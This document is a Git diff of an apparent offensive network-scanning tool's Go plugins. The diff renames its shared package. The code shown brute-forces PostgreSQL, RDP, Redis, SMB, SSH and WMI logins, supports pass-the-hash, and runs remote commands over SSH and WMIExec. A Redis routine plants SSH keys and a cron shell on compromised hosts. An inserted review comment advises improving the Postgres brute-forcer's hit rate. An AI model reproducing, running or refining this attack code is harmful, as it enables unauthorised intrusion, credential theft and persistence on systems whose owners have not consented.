@@ -4,31 +4,31 @@ import ( "database/sql" "fmt" _ "github.com/lib/pq" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "strings" "time" ) func PostgresScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } starttime := time.Now().Unix() - for _, user := range common.Userdict["postgresql"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["postgresql"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", string(user), -1) flag, err := PostgresConn(info, user, pass) if flag == true && err == nil { return err } else { errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["postgresql"])*len(Common.Passwords)) * Common.Timeout) { return err } } @@ -43,12 +43,12 @@ func PostgresConn(info *Config.HostInfo, user string, pass string) (flag bool, e dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable") db, err := sql.Open("postgres", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second) defer db.Close() err = db.Ping() if err == nil { result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password) - common.LogSuccess(result) + Common.LogSuccess(result) flag = true } } diff --git a/Plugins/rdp.go b/Plugins/RDP.go similarity index 89% rename from Plugins/rdp.go rename to Plugins/RDP.go index 4bae7a6..4e80e1f 100644 --- a/Plugins/rdp.go +++ b/Plugins/RDP.go 
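Review bot: `PostgresConn` builds its connection URL with `fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", ...)` and no escaping, so a password containing `@`, `/`, `#`, `?` or `%` produces a URL that `lib/pq` parses as a different host or fails on, and the brute-force loop records it as a plain failed login — a silent false negative for the passwords most likely to be in a real wordlist. Use `net/url` so the credentials are percent-encoded: `u := url.URL{Scheme: "postgres", User: url.UserPassword(Username, Password), Host: fmt.Sprintf("%v:%v", Host, Port), Path: "postgres", RawQuery: "sslmode=disable"}` and `db, err := sql.Open("postgres", u.String())` (needs `net/url` in the import block). Separately, `sslmode=disable` is refused by servers whose `pg_hba.conf` only has `hostssl` entries, and `lib/pq` does not implement `sslmode=prefer`, so covering those targets would need a second attempt with `sslmode=require`. The import block and the tail of `PostgresConn` sit partly outside this hunk.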
@@ -3,8 +3,8 @@ package Plugins import ( "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "github.com/tomatome/grdp/core" "github.com/tomatome/grdp/glog" "github.com/tomatome/grdp/protocol/nla" @@ -28,25 +28,25 @@ type Brutelist struct { } func RdpScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } var wg sync.WaitGroup var signal bool var num = 0 - var all = len(common.Userdict["rdp"]) * len(common.Passwords) + var all = len(Common.Userdict["rdp"]) * len(Common.Passwords) var mutex sync.Mutex brlist := make(chan Brutelist) port, _ := strconv.Atoi(info.Ports) - for i := 0; i < common.BruteThread; i++ { + for i := 0; i < Common.BruteThread; i++ { wg.Add(1) - go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout) + go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout) } - for _, user := range common.Userdict["rdp"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["rdp"] { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) brlist <- Brutelist{user, pass} } @@ -78,12 +78,12 @@ func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brute } else { result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass) } - common.LogSuccess(result) + Common.LogSuccess(result) *signal = true return } else { errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) } } } 
@@ -126,7 +126,7 @@ func NewClient(host string, logLevel glog.LEVEL) *Client { } func (g *Client) Login(domain, user, pwd string, timeout int64) error { - conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second) if err != nil { return fmt.Errorf("[dial err] %v", err) } diff --git a/Plugins/redis.go b/Plugins/Redis.go similarity index 89% rename from Plugins/redis.go rename to Plugins/Redis.go index 39e6a6b..06d24c5 100644 --- a/Plugins/redis.go +++ b/Plugins/Redis.go @@ -3,8 +3,8 @@ package Plugins import ( "bufio" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "io" "net" "os" @@ -23,22 +23,22 @@ func RedisScan(info *Config.HostInfo) (tmperr error) { if flag == true && err == nil { return err } - if common.IsBrute { + if Common.IsBrute { return } - for _, pass := range common.Passwords { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", "redis", -1) flag, err := RedisConn(info, pass) if flag == true && err == nil { return err } else { errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Passwords)) * Common.Timeout) { return err } } 
@@ -49,12 +49,12 @@ func RedisScan(info *Config.HostInfo) (tmperr error) { func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return flag, err } defer conn.Close() - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return flag, err } @@ -71,11 +71,11 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) { dbfilename, dir, err = getconfig(conn) if err != nil { result := fmt.Sprintf("[+] Redis %s %s", realhost, pass) - common.LogSuccess(result) + Common.LogSuccess(result) return flag, err } else { result := fmt.Sprintf("[+] Redis %s %s file:%s/%s", realhost, pass, dir, dbfilename) - common.LogSuccess(result) + Common.LogSuccess(result) } err = Expoilt(realhost, conn) } @@ -85,12 +85,12 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) { func RedisUnauth(info *Config.HostInfo) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second) if err != nil { return flag, err } defer conn.Close() - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)) if err != nil { return flag, err } 
@@ -107,11 +107,11 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) { dbfilename, dir, err = getconfig(conn) if err != nil { result := fmt.Sprintf("[+] Redis %s unauthorized", realhost) - common.LogSuccess(result) + Common.LogSuccess(result) return flag, err } else { result := fmt.Sprintf("[+] Redis %s unauthorized file:%s/%s", realhost, dir, dbfilename) - common.LogSuccess(result) + Common.LogSuccess(result) } err = Expoilt(realhost, conn) } @@ -119,7 +119,7 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) { } func Expoilt(realhost string, conn net.Conn) error { - if common.Noredistest { + if Common.Noredistest { return nil } flagSsh, flagCron, err := testwrite(conn) @@ -128,16 +128,16 @@ func Expoilt(realhost string, conn net.Conn) error { } if flagSsh == true { result := fmt.Sprintf("[+] Redis %v like can write /root/.ssh/", realhost) - common.LogSuccess(result) - if common.RedisFile != "" { - writeok, text, err := writekey(conn, common.RedisFile) + Common.LogSuccess(result) + if Common.RedisFile != "" { + writeok, text, err := writekey(conn, Common.RedisFile) if err != nil { fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text)) return err } if writeok { result := fmt.Sprintf("[+] Redis %v SSH public key was written successfully", realhost) - common.LogSuccess(result) + Common.LogSuccess(result) } else { fmt.Println("[-] Redis ", realhost, "SSHPUB write failed", text) } 
@@ -146,15 +146,15 @@ func Expoilt(realhost string, conn net.Conn) error { if flagCron == true { result := fmt.Sprintf("[+] Redis %v like can write /var/spool/cron/", realhost) - common.LogSuccess(result) - if common.RedisShell != "" { - writeok, text, err := writecron(conn, common.RedisShell) + Common.LogSuccess(result) + if Common.RedisShell != "" { + writeok, text, err := writecron(conn, Common.RedisShell) if err != nil { return err } if writeok { result := fmt.Sprintf("[+] Redis %v /var/spool/cron/root was written successfully", realhost) - common.LogSuccess(result) + Common.LogSuccess(result) } else { fmt.Println("[-] Redis ", realhost, "cron write failed", text) } diff --git a/Plugins/smb.go b/Plugins/SMB.go similarity index 81% rename from Plugins/smb.go rename to Plugins/SMB.go index 138aef2..785861a 100644 --- a/Plugins/smb.go +++ b/Plugins/SMB.go @@ -3,8 +3,8 @@ package Plugins import ( "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "github.com/stacktitan/smb/smb" "strings" "time" @@ -13,15 +13,15 @@ import ( // SmbScan 执行SMB服务的认证扫描 func SmbScan(info *Config.HostInfo) (tmperr error) { // 如果未启用暴力破解则直接返回 - if common.IsBrute { + if Common.IsBrute { return nil } startTime := time.Now().Unix() // 遍历用户名和密码字典进行认证尝试 - for _, user := range common.Userdict["smb"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["smb"] { + for _, pass := range Common.Passwords { // 替换密码中的用户名占位符 pass = strings.Replace(pass, "{user}", user, -1) 
@@ -31,30 +31,30 @@ func SmbScan(info *Config.HostInfo) (tmperr error) { if success && err == nil { // 认证成功,记录结果 var result string - if common.Domain != "" { + if Common.Domain != "" { result = fmt.Sprintf("[✓] SMB认证成功 %v:%v Domain:%v\\%v Pass:%v", - info.Host, info.Ports, common.Domain, user, pass) + info.Host, info.Ports, Common.Domain, user, pass) } else { result = fmt.Sprintf("[✓] SMB认证成功 %v:%v User:%v Pass:%v", info.Host, info.Ports, user, pass) } - common.LogSuccess(result) + Common.LogSuccess(result) return err } else { // 认证失败,记录错误 errorMsg := fmt.Sprintf("[x] SMB认证失败 %v:%v User:%v Pass:%v Err:%v", info.Host, info.Ports, user, pass, strings.ReplaceAll(err.Error(), "\n", "")) - common.LogError(errorMsg) + Common.LogError(errorMsg) tmperr = err // 检查是否需要中断扫描 - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } // 检查是否超时 - timeoutLimit := int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout + timeoutLimit := int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout if time.Now().Unix()-startTime > timeoutLimit { return err } @@ -74,7 +74,7 @@ func SmblConn(info *Config.HostInfo, user string, pass string, signal chan struc Port: 445, User: user, Password: pass, - Domain: common.Domain, + Domain: Common.Domain, Workstation: "", } @@ -105,7 +105,7 @@ func doWithTimeOut(info *Config.HostInfo, user string, pass string) (flag bool, select { case <-signal: return flag, err - case <-time.After(time.Duration(common.Timeout) * time.Second): + case <-time.After(time.Duration(Common.Timeout) * time.Second): return false, errors.New("[!] SMB连接超时") } } diff --git a/Plugins/smb2.go b/Plugins/SMB2.go similarity index 81% rename from Plugins/smb2.go rename to Plugins/SMB2.go index eadf67d..76b25fe 100644 --- a/Plugins/smb2.go +++ b/Plugins/SMB2.go 
@@ -2,8 +2,8 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "net" "os" "strings" @@ -15,7 +15,7 @@ import ( // SmbScan2 执行SMB2服务的认证扫描,支持密码和哈希两种认证方式 func SmbScan2(info *Config.HostInfo) (tmperr error) { // 如果未启用暴力破解则直接返回 - if common.IsBrute { + if Common.IsBrute { return nil } @@ -23,7 +23,7 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) { startTime := time.Now().Unix() // 使用哈希认证模式 - if len(common.HashBytes) > 0 { + if len(Common.HashBytes) > 0 { return smbHashScan(info, hasprint, startTime) } @@ -33,8 +33,8 @@ func SmbScan2(info *Config.HostInfo) (tmperr error) { // smbHashScan 使用哈希进行认证扫描 func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error { - for _, user := range common.Userdict["smb"] { - for _, hash := range common.HashBytes { + for _, user := range Common.Userdict["smb"] { + for _, hash := range Common.HashBytes { success, err, printed := Smb2Con(info, user, "", hash, hasprint) if printed { hasprint = true @@ -47,11 +47,11 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error { logFailedAuth(info, user, "", hash, err) - if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.HashBytes)) { + if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.HashBytes)) { return err } - if len(common.Hash) > 0 { + if len(Common.Hash) > 0 { break } } @@ -61,8 +61,8 @@ func smbHashScan(info *Config.HostInfo, hasprint bool, startTime int64) error { // smbPasswordScan 使用密码进行认证扫描 func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) error { - for _, user := range common.Userdict["smb"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["smb"] { + for _, pass := range Common.Passwords { pass = strings.ReplaceAll(pass, "{user}", user) success, err, printed := Smb2Con(info, user, pass, []byte{}, hasprint) if printed { 
@@ -76,11 +76,11 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro logFailedAuth(info, user, pass, []byte{}, err) - if shouldStopScan(err, startTime, len(common.Userdict["smb"])*len(common.Passwords)) { + if shouldStopScan(err, startTime, len(Common.Userdict["smb"])*len(Common.Passwords)) { return err } - if len(common.Hash) > 0 { + if len(Common.Hash) > 0 { break } } @@ -91,20 +91,20 @@ func smbPasswordScan(info *Config.HostInfo, hasprint bool, startTime int64) erro // logSuccessfulAuth 记录成功的认证 func logSuccessfulAuth(info *Config.HostInfo, user, pass string, hash []byte) { var result string - if common.Domain != "" { + if Common.Domain != "" { result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v Domain:%v\\%v ", - info.Host, info.Ports, common.Domain, user) + info.Host, info.Ports, Common.Domain, user) } else { result = fmt.Sprintf("[✓] SMB2认证成功 %v:%v User:%v ", info.Host, info.Ports, user) } if len(hash) > 0 { - result += fmt.Sprintf("Hash:%v", common.Hash) + result += fmt.Sprintf("Hash:%v", Common.Hash) } else { result += fmt.Sprintf("Pass:%v", pass) } - common.LogSuccess(result) + Common.LogSuccess(result) } // logFailedAuth 记录失败的认证 
@@ -112,22 +112,22 @@ func logFailedAuth(info *Config.HostInfo, user, pass string, hash []byte, err er var errlog string if len(hash) > 0 { errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v", - info.Host, info.Ports, user, common.Hash, err) + info.Host, info.Ports, user, Common.Hash, err) } else { errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v", info.Host, info.Ports, user, pass, err) } errlog = strings.ReplaceAll(errlog, "\n", " ") - common.LogError(errlog) + Common.LogError(errlog) } // shouldStopScan 检查是否应该停止扫描 func shouldStopScan(err error, startTime int64, totalAttempts int) bool { - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return true } - if time.Now().Unix()-startTime > (int64(totalAttempts) * common.Timeout) { + if time.Now().Unix()-startTime > (int64(totalAttempts) * Common.Timeout) { return true } @@ -138,7 +138,7 @@ func shouldStopScan(err error, startTime int64, totalAttempts int) bool { func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) { // 建立TCP连接 conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:445", info.Host), - time.Duration(common.Timeout)*time.Second) + time.Duration(Common.Timeout)*time.Second) if err != nil { return false, fmt.Errorf("连接失败: %v", err), false } @@ -147,7 +147,7 @@ func Smb2Con(info *Config.HostInfo, user string, pass string, hash []byte, haspr // 配置NTLM认证 initiator := smb2.NTLMInitiator{ User: user, - Domain: common.Domain, + Domain: Common.Domain, } // 设置认证方式(哈希或密码) @@ -202,9 +202,9 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte, var result string // 构建基础信息 - if common.Domain != "" { + if Common.Domain != "" { result = fmt.Sprintf("[*] SMB2共享信息 %v:%v Domain:%v\\%v ", - info.Host, info.Ports, common.Domain, user) + info.Host, info.Ports, Common.Domain, user) } else { result = fmt.Sprintf("[*] SMB2共享信息 %v:%v User:%v ", info.Host, info.Ports, user) 
@@ -212,12 +212,12 @@ func logShareInfo(info *Config.HostInfo, user string, pass string, hash []byte, // 添加认证信息 if len(hash) > 0 { - result += fmt.Sprintf("Hash:%v ", common.Hash) + result += fmt.Sprintf("Hash:%v ", Common.Hash) } else { result += fmt.Sprintf("Pass:%v ", pass) } // 添加共享列表 result += fmt.Sprintf("可用共享: %v", shares) - common.LogSuccess(result) + Common.LogSuccess(result) } diff --git a/Plugins/ssh.go b/Plugins/SSH.go similarity index 73% rename from Plugins/ssh.go rename to Plugins/SSH.go index d1a5d09..204ab52 100644 --- a/Plugins/ssh.go +++ b/Plugins/SSH.go @@ -2,8 +2,8 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "golang.org/x/crypto/ssh" "io/ioutil" "net" @@ -13,15 +13,15 @@ import ( // SshScan 执行SSH服务的认证扫描 func SshScan(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return } startTime := time.Now().Unix() // 遍历用户名和密码字典进行认证尝试 - for _, user := range common.Userdict["ssh"] { - for _, pass := range common.Passwords { + for _, user := range Common.Userdict["ssh"] { + for _, pass := range Common.Passwords { // 替换密码中的用户名占位符 pass = strings.Replace(pass, "{user}", user, -1) @@ -33,22 +33,22 @@ func SshScan(info *Config.HostInfo) (tmperr error) { // 记录失败信息 errlog := fmt.Sprintf("[x] SSH认证失败 %v:%v User:%v Pass:%v Err:%v", info.Host, info.Ports, user, pass, err) - common.LogError(errlog) + Common.LogError(errlog) tmperr = err // 检查是否需要中断扫描 - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } // 检查是否超时 - timeoutLimit := int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout + timeoutLimit := int64(len(Common.Userdict["ssh"])*len(Common.Passwords)) * Common.Timeout if time.Now().Unix()-startTime > timeoutLimit { return err } // 如果指定了SSH密钥,则不进行密码尝试 - if common.SshKey != "" { + if Common.SshKey != "" { return err } } 
@@ -60,9 +60,9 @@ func SshScan(info *Config.HostInfo) (tmperr error) { func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { // 准备认证方法 var auth []ssh.AuthMethod - if common.SshKey != "" { + if Common.SshKey != "" { // 使用SSH密钥认证 - pemBytes, err := ioutil.ReadFile(common.SshKey) + pemBytes, err := ioutil.ReadFile(Common.SshKey) if err != nil { return false, fmt.Errorf("读取密钥失败: %v", err) } @@ -81,7 +81,7 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er config := &ssh.ClientConfig{ User: user, Auth: auth, - Timeout: time.Duration(common.Timeout) * time.Second, + Timeout: time.Duration(Common.Timeout) * time.Second, HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error { return nil }, @@ -97,23 +97,23 @@ func SshConn(info *Config.HostInfo, user string, pass string) (flag bool, err er flag = true // 处理认证成功的情况 - if common.Command != "" { + if Common.Command != "" { // 执行指定命令 - output, _ := session.CombinedOutput(common.Command) - if common.SshKey != "" { - common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v", + output, _ := session.CombinedOutput(Common.Command) + if Common.SshKey != "" { + Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v\n命令输出:\n%v", info.Host, info.Ports, string(output))) } else { - common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v", + Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v\n命令输出:\n%v", info.Host, info.Ports, user, pass, string(output))) } } else { // 仅记录认证成功 - if common.SshKey != "" { - common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v", + if Common.SshKey != "" { + Common.LogSuccess(fmt.Sprintf("[✓] SSH密钥认证成功 %v:%v", info.Host, info.Ports)) } else { - common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v", + Common.LogSuccess(fmt.Sprintf("[✓] SSH认证成功 %v:%v User:%v Pass:%v", info.Host, info.Ports, user, pass)) } } 
diff --git a/Plugins/scanner.go b/Plugins/Scanner.go similarity index 75% rename from Plugins/scanner.go rename to Plugins/Scanner.go index 4c7cff6..385640d 100644 --- a/Plugins/scanner.go +++ b/Plugins/Scanner.go @@ -2,9 +2,9 @@ package Plugins import ( "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/WebScan/lib" - "github.com/shadow1ng/fscan/common" "strconv" "strings" "sync" @@ -14,19 +14,19 @@ func Scan(info Config.HostInfo) { fmt.Println("[*] 开始信息扫描...") // 本地信息收集模块 - if common.Scantype == "localinfo" { - ch := make(chan struct{}, common.Threads) + if Common.Scantype == "localinfo" { + ch := make(chan struct{}, Common.Threads) wg := sync.WaitGroup{} AddScan("localinfo", info, &ch, &wg) wg.Wait() - common.LogWG.Wait() - close(common.Results) - fmt.Printf("[✓] 扫描完成 %v/%v\n", common.End, common.Num) + Common.LogWG.Wait() + close(Common.Results) + fmt.Printf("[✓] 扫描完成 %v/%v\n", Common.End, Common.Num) return } // 解析目标主机IP - Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts) + Hosts, err := Common.ParseIP(info.Host, Common.HostFile, Common.NoHosts) if err != nil { fmt.Printf("[!] 解析主机错误: %v\n", err) return 
@@ -34,29 +34,29 @@ func Scan(info Config.HostInfo) { // 初始化配置 lib.Inithttp() - ch := make(chan struct{}, common.Threads) + ch := make(chan struct{}, Common.Threads) wg := sync.WaitGroup{} var AlivePorts []string - if len(Hosts) > 0 || len(common.HostPort) > 0 { + if len(Hosts) > 0 || len(Common.HostPort) > 0 { // ICMP存活性检测 - if (common.NoPing == false && len(Hosts) > 1) || common.Scantype == "icmp" { - Hosts = CheckLive(Hosts, common.Ping) + if (Common.NoPing == false && len(Hosts) > 1) || Common.Scantype == "icmp" { + Hosts = CheckLive(Hosts, Common.Ping) fmt.Printf("[+] ICMP存活主机数量: %d\n", len(Hosts)) - if common.Scantype == "icmp" { - common.LogWG.Wait() + if Common.Scantype == "icmp" { + Common.LogWG.Wait() return } } // 端口扫描策略 - AlivePorts = executeScanStrategy(Hosts, common.Scantype) + AlivePorts = executeScanStrategy(Hosts, Common.Scantype) // 处理自定义端口 - if len(common.HostPort) > 0 { - AlivePorts = append(AlivePorts, common.HostPort...) - AlivePorts = common.RemoveDuplicate(AlivePorts) - common.HostPort = nil + if len(Common.HostPort) > 0 { + AlivePorts = append(AlivePorts, Common.HostPort...) + AlivePorts = Common.RemoveDuplicate(AlivePorts) + Common.HostPort = nil fmt.Printf("[+] 总计存活端口: %d\n", len(AlivePorts)) } 
@@ -70,37 +70,37 @@ func Scan(info Config.HostInfo) { } info.Host, info.Ports = hostParts[0], hostParts[1] - executeScanTasks(info, common.Scantype, &ch, &wg) + executeScanTasks(info, Common.Scantype, &ch, &wg) } } // URL扫描 - for _, url := range common.Urls { + for _, url := range Common.Urls { info.Url = url AddScan("web", info, &ch, &wg) } // 等待所有任务完成 wg.Wait() - common.LogWG.Wait() - close(common.Results) - fmt.Printf("[✓] 扫描已完成: %v/%v\n", common.End, common.Num) + Common.LogWG.Wait() + close(Common.Results) + fmt.Printf("[✓] 扫描已完成: %v/%v\n", Common.End, Common.Num) } // executeScanStrategy 执行端口扫描策略 func executeScanStrategy(Hosts []string, scanType string) []string { switch scanType { case "webonly", "webpoc": - return NoPortScan(Hosts, common.Ports) + return NoPortScan(Hosts, Common.Ports) case "hostname": - common.Ports = "139" - return NoPortScan(Hosts, common.Ports) + Common.Ports = "139" + return NoPortScan(Hosts, Common.Ports) default: if len(Hosts) > 0 { - ports := PortScan(Hosts, common.Ports, common.Timeout) + ports := PortScan(Hosts, Common.Ports, Common.Timeout) fmt.Printf("[+] 存活端口数量: %d\n", len(ports)) if scanType == "portscan" { - common.LogWG.Wait() + Common.LogWG.Wait() return nil } return ports @@ -116,7 +116,7 @@ func executeScanTasks(info Config.HostInfo, scanType string, ch *chan struct{}, switch info.Ports { case "135": AddScan("findnet", info, ch, wg) - if common.IsWmi { + if Common.IsWmi { AddScan("wmiexec", info, ch, wg) } case "445": @@ -160,7 +160,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync. // 增加总任务数 Mutex.Lock() - common.Num += 1 + Common.Num += 1 Mutex.Unlock() // 执行扫描 @@ -168,7 +168,7 @@ func AddScan(scantype string, info Config.HostInfo, ch *chan struct{}, wg *sync. // 增加已完成任务数 Mutex.Lock() - common.End += 1 + Common.End += 1 Mutex.Unlock() }() } 
diff --git a/Plugins/wmiexec.go b/Plugins/WMIExec.go similarity index 75% rename from Plugins/wmiexec.go rename to Plugins/WMIExec.go index bd230e2..5337f03 100644 --- a/Plugins/wmiexec.go +++ b/Plugins/WMIExec.go @@ -3,8 +3,8 @@ package Plugins import ( "errors" "fmt" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/Config" - "github.com/shadow1ng/fscan/common" "os" "strings" "time" 
@@ -28,42 +28,42 @@ func init() { } func WmiExec(info *Config.HostInfo) (tmperr error) { - if common.IsBrute { + if Common.IsBrute { return nil } starttime := time.Now().Unix() - for _, user := range common.Userdict["smb"] { + for _, user := range Common.Userdict["smb"] { PASS: - for _, pass := range common.Passwords { + for _, pass := range Common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := Wmiexec(info, user, pass, common.Hash) + flag, err := Wmiexec(info, user, pass, Common.Hash) errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err) errlog = strings.Replace(errlog, "\n", "", -1) - common.LogError(errlog) + Common.LogError(errlog) if flag == true { var result string - if common.Domain != "" { - result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) + if Common.Domain != "" { + result = fmt.Sprintf("[+] WmiExec %v:%v:%v\\%v ", info.Host, info.Ports, Common.Domain, user) } else { result = fmt.Sprintf("[+] WmiExec %v:%v:%v ", info.Host, info.Ports, user) } - if common.Hash != "" { - result += "hash: " + common.Hash + if Common.Hash != "" { + result += "hash: " + Common.Hash } else { result += pass } - common.LogSuccess(result) + Common.LogSuccess(result) return err } else { tmperr = err - if common.CheckErrs(err) { + if Common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(Common.Userdict["smb"])*len(Common.Passwords)) * Common.Timeout) { return err } } - if len(common.Hash) == 32 { + if len(Common.Hash) == 32 { break PASS } } 
@@ -73,8 +73,8 @@ func WmiExec(info *Config.HostInfo) (tmperr error) { func Wmiexec(info *Config.HostInfo, user string, pass string, hash string) (flag bool, err error) { target := fmt.Sprintf("%s:%v", info.Host, info.Ports) - wmiexec.Timeout = int(common.Timeout) - return WMIExec(target, user, pass, hash, common.Domain, common.Command, ClientHost, "", nil) + wmiexec.Timeout = int(Common.Timeout) + return WMIExec(target, user, pass, hash, Common.Domain, Common.Command, ClientHost, "", nil) } func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) { diff --git a/Plugins/webtitle.go b/Plugins/WebTitle.go similarity index 90% rename from Plugins/webtitle.go rename to Plugins/WebTitle.go index d04bc84..ccc4e98 100644 --- a/Plugins/webtitle.go +++ b/Plugins/WebTitle.go @@ -13,14 +13,14 @@ import ( "time" "unicode/utf8" + "github.com/shadow1ng/fscan/Common" "github.com/shadow1ng/fscan/WebScan" "github.com/shadow1ng/fscan/WebScan/lib" - "github.com/shadow1ng/fscan/common" "golang.org/x/text/encoding/simplifiedchinese" ) func WebTitle(info *Config.HostInfo) error { - if common.Scantype == "webpoc" { + if Common.Scantype == "webpoc" { WebScan.WebScan(info) return nil } @@ -32,11 +32,11 @@ func WebTitle(info *Config.HostInfo) error { return nil } } - if !common.NoPoc && err == nil { + if !Common.NoPoc && err == nil { WebScan.WebScan(info) } else { errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err) - common.LogError(errlog) + Common.LogError(errlog) } return err } 
